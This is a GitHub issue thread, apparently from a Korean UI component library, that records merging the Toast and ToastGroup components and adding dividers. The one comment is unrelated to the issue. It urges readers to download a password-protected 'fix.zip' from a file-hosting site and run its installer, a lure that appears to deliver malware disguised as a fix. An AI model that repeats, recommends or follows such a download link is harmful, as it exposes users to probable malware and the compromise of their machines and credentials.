### ISSUE TITLE
[DOC] Toastgroup 통합과 구분선 추가

### ISSUE THREAD

**Issue by allone9425** [Poten14/Componique#218]
## 💥이슈 설명
- 기존에 ToastGroup과 Toast를 통합
- 그외 자잘한 구분선 추가 

## 📚할 일 목록
- [x] toast 통합
- [x] 구분선 추가

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
